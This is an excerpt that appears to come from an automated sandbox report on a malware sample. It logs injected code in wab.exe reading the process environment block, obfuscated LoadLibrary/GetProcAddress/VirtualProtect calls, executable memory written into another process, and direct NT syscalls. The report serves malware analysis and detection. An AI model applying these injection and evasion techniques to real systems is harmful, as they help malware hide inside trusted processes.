Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F1A118 mov eax, dword ptr fs:[00000030h]		1_2_02F1A118
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2D6F0 mov eax, dword ptr fs:[00000030h]		1_2_02F2D6F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D6E0 mov eax, dword ptr fs:[00000030h]		1_2_02E9D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D6E0 mov eax, dword ptr fs:[00000030h]		1_2_02E9D6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEE6F2 mov eax, dword ptr fs:[00000030h]		1_2_02EEE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEE6F2 mov eax, dword ptr fs:[00000030h]		1_2_02EEE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEE6F2 mov eax, dword ptr fs:[00000030h]		1_2_02EEE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEE6F2 mov eax, dword ptr fs:[00000030h]		1_2_02EEE6F2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF06F1 mov eax, dword ptr fs:[00000030h]		1_2_02EF06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF06F1 mov eax, dword ptr fs:[00000030h]		1_2_02EF06F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]		1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]		1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]		1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]		1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]		1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F036EE mov eax, dword ptr fs:[00000030h]		1_2_02F036EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA16CF mov eax, dword ptr fs:[00000030h]		1_2_02EA16CF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7B6C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7B6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA6C7 mov ebx, dword ptr fs:[00000030h]		1_2_02EAA6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA6C7 mov eax, dword ptr fs:[00000030h]		1_2_02EAA6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F6C7 mov eax, dword ptr fs:[00000030h]		1_2_02F2F6C7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F316CC mov eax, dword ptr fs:[00000030h]		1_2_02F316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F316CC mov eax, dword ptr fs:[00000030h]		1_2_02F316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F316CC mov eax, dword ptr fs:[00000030h]		1_2_02F316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F316CC mov eax, dword ptr fs:[00000030h]		1_2_02F316CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D6AA mov eax, dword ptr fs:[00000030h]		1_2_02E6D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6D6AA mov eax, dword ptr fs:[00000030h]		1_2_02E6D6AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAC6A6 mov eax, dword ptr fs:[00000030h]		1_2_02EAC6A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E676B2 mov eax, dword ptr fs:[00000030h]		1_2_02E676B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E676B2 mov eax, dword ptr fs:[00000030h]		1_2_02E676B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E676B2 mov eax, dword ptr fs:[00000030h]		1_2_02E676B2
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA66B0 mov eax, dword ptr fs:[00000030h]		1_2_02EA66B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF368C mov eax, dword ptr fs:[00000030h]		1_2_02EF368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF368C mov eax, dword ptr fs:[00000030h]		1_2_02EF368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF368C mov eax, dword ptr fs:[00000030h]		1_2_02EF368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF368C mov eax, dword ptr fs:[00000030h]		1_2_02EF368C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E74690 mov eax, dword ptr fs:[00000030h]		1_2_02E74690
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E74690 mov eax, dword ptr fs:[00000030h]		1_2_02E74690
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA660 mov eax, dword ptr fs:[00000030h]		1_2_02EAA660
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAA660 mov eax, dword ptr fs:[00000030h]		1_2_02EAA660
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA9660 mov eax, dword ptr fs:[00000030h]		1_2_02EA9660
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA9660 mov eax, dword ptr fs:[00000030h]		1_2_02EA9660
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3866E mov eax, dword ptr fs:[00000030h]		1_2_02F3866E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3866E mov eax, dword ptr fs:[00000030h]		1_2_02F3866E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA2674 mov eax, dword ptr fs:[00000030h]		1_2_02EA2674
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8C640 mov eax, dword ptr fs:[00000030h]		1_2_02E8C640
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]		1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]		1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]		1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]		1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]		1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]		1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]		1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]		1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F626 mov eax, dword ptr fs:[00000030h]		1_2_02E6F626
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F45636 mov eax, dword ptr fs:[00000030h]		1_2_02F45636
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA6620 mov eax, dword ptr fs:[00000030h]		1_2_02EA6620
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA8620 mov eax, dword ptr fs:[00000030h]		1_2_02EA8620
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7262C mov eax, dword ptr fs:[00000030h]		1_2_02E7262C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8E627 mov eax, dword ptr fs:[00000030h]		1_2_02E8E627
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]		1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]		1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]		1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]		1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]		1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]		1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8260B mov eax, dword ptr fs:[00000030h]		1_2_02E8260B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEE609 mov eax, dword ptr fs:[00000030h]		1_2_02EEE609
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAF603 mov eax, dword ptr fs:[00000030h]		1_2_02EAF603
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA1607 mov eax, dword ptr fs:[00000030h]		1_2_02EA1607
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E73616 mov eax, dword ptr fs:[00000030h]		1_2_02E73616
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E73616 mov eax, dword ptr fs:[00000030h]		1_2_02E73616
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2619 mov eax, dword ptr fs:[00000030h]		1_2_02EB2619
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E927ED mov eax, dword ptr fs:[00000030h]		1_2_02E927ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E927ED mov eax, dword ptr fs:[00000030h]		1_2_02E927ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E927ED mov eax, dword ptr fs:[00000030h]		1_2_02E927ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7D7E0 mov ecx, dword ptr fs:[00000030h]		1_2_02E7D7E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E747FB mov eax, dword ptr fs:[00000030h]		1_2_02E747FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E747FB mov eax, dword ptr fs:[00000030h]		1_2_02E747FB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7C7C0 mov eax, dword ptr fs:[00000030h]		1_2_02E7C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E757C0 mov eax, dword ptr fs:[00000030h]		1_2_02E757C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E757C0 mov eax, dword ptr fs:[00000030h]		1_2_02E757C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E757C0 mov eax, dword ptr fs:[00000030h]		1_2_02E757C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EFF7AF mov eax, dword ptr fs:[00000030h]		1_2_02EFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EFF7AF mov eax, dword ptr fs:[00000030h]		1_2_02EFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EFF7AF mov eax, dword ptr fs:[00000030h]		1_2_02EFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EFF7AF mov eax, dword ptr fs:[00000030h]		1_2_02EFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EFF7AF mov eax, dword ptr fs:[00000030h]		1_2_02EFF7AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F437B6 mov eax, dword ptr fs:[00000030h]		1_2_02F437B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF97A9 mov eax, dword ptr fs:[00000030h]		1_2_02EF97A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E707AF mov eax, dword ptr fs:[00000030h]		1_2_02E707AF
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E9D7B0 mov eax, dword ptr fs:[00000030h]		1_2_02E9D7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]		1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]		1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]		1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]		1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]		1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]		1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]		1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]		1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6F7BA mov eax, dword ptr fs:[00000030h]		1_2_02E6F7BA
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F78A mov eax, dword ptr fs:[00000030h]		1_2_02F2F78A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B765 mov eax, dword ptr fs:[00000030h]		1_2_02E6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B765 mov eax, dword ptr fs:[00000030h]		1_2_02E6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B765 mov eax, dword ptr fs:[00000030h]		1_2_02E6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E6B765 mov eax, dword ptr fs:[00000030h]		1_2_02E6B765
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E78770 mov eax, dword ptr fs:[00000030h]		1_2_02E78770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E80770 mov eax, dword ptr fs:[00000030h]		1_2_02E80770
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA674D mov esi, dword ptr fs:[00000030h]		1_2_02EA674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA674D mov eax, dword ptr fs:[00000030h]		1_2_02EA674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA674D mov eax, dword ptr fs:[00000030h]		1_2_02EA674D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E83740 mov eax, dword ptr fs:[00000030h]		1_2_02E83740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E83740 mov eax, dword ptr fs:[00000030h]		1_2_02E83740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E83740 mov eax, dword ptr fs:[00000030h]		1_2_02E83740
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E70750 mov eax, dword ptr fs:[00000030h]		1_2_02E70750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EF4755 mov eax, dword ptr fs:[00000030h]		1_2_02EF4755
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2750 mov eax, dword ptr fs:[00000030h]		1_2_02EB2750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EB2750 mov eax, dword ptr fs:[00000030h]		1_2_02EB2750
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F43749 mov eax, dword ptr fs:[00000030h]		1_2_02F43749
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E73720 mov eax, dword ptr fs:[00000030h]		1_2_02E73720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4B73C mov eax, dword ptr fs:[00000030h]		1_2_02F4B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4B73C mov eax, dword ptr fs:[00000030h]		1_2_02F4B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4B73C mov eax, dword ptr fs:[00000030h]		1_2_02F4B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F4B73C mov eax, dword ptr fs:[00000030h]		1_2_02F4B73C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8F720 mov eax, dword ptr fs:[00000030h]		1_2_02E8F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8F720 mov eax, dword ptr fs:[00000030h]		1_2_02E8F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E8F720 mov eax, dword ptr fs:[00000030h]		1_2_02E8F720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAC720 mov eax, dword ptr fs:[00000030h]		1_2_02EAC720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAC720 mov eax, dword ptr fs:[00000030h]		1_2_02EAC720
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA273C mov eax, dword ptr fs:[00000030h]		1_2_02EA273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA273C mov ecx, dword ptr fs:[00000030h]		1_2_02EA273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA273C mov eax, dword ptr fs:[00000030h]		1_2_02EA273C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69730 mov eax, dword ptr fs:[00000030h]		1_2_02E69730
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E69730 mov eax, dword ptr fs:[00000030h]		1_2_02E69730
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F3972B mov eax, dword ptr fs:[00000030h]		1_2_02F3972B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F2F72E mov eax, dword ptr fs:[00000030h]		1_2_02F2F72E
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7973A mov eax, dword ptr fs:[00000030h]		1_2_02E7973A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E7973A mov eax, dword ptr fs:[00000030h]		1_2_02E7973A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EEC730 mov eax, dword ptr fs:[00000030h]		1_2_02EEC730
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA5734 mov eax, dword ptr fs:[00000030h]		1_2_02EA5734
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E77703 mov eax, dword ptr fs:[00000030h]		1_2_02E77703
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E75702 mov eax, dword ptr fs:[00000030h]		1_2_02E75702
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E75702 mov eax, dword ptr fs:[00000030h]		1_2_02E75702
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAC700 mov eax, dword ptr fs:[00000030h]		1_2_02EAC700
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAF71F mov eax, dword ptr fs:[00000030h]		1_2_02EAF71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EAF71F mov eax, dword ptr fs:[00000030h]		1_2_02EAF71F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E70710 mov eax, dword ptr fs:[00000030h]		1_2_02E70710
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02EA0710 mov eax, dword ptr fs:[00000030h]		1_2_02EA0710
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E704E5 mov ecx, dword ptr fs:[00000030h]		1_2_02E704E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F194E0 mov eax, dword ptr fs:[00000030h]		1_2_02F194E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02F454DB mov eax, dword ptr fs:[00000030h]		1_2_02F454DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 1_2_02E764AB mov eax, dword ptr fs:[00000030h]		1_2_02E764AB

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: RN# D7521-RN-00353 REV-2.exe, ------.cs	Reference to suspicious API methods: LoadLibrary(_FBCA_FBB2_060D_FDD5(_FD48_066D._06E4_06FE_FDE2_FDC8))
Source: RN# D7521-RN-00353 REV-2.exe, ------.cs	Reference to suspicious API methods: GetProcAddress(intPtr, _FBCA_FBB2_060D_FDD5(_FD48_066D._FDDD_FBD2_061A_0610_FDE7_FDDC))
Source: RN# D7521-RN-00353 REV-2.exe, ------.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (uint)array.ToArray().Length, 64u, out var _06E2_061F_06D6_064C_06DA_06DB_06D8)

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Memory allocated: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000 protect: page execute and read and write

Jump to behavior

Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtCreateKey: Direct from: 0x76F02C6C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtSetInformationThread: Direct from: 0x76F02B4C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQuerySystemInformation: Direct from: 0x76F048CC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtOpenSection: Direct from: 0x76F02E0C			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtCreateFile: Direct from: 0x76F02FEC			Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	NtOpenFile: Direct from: 0x76F02DCC			Jump to behavior
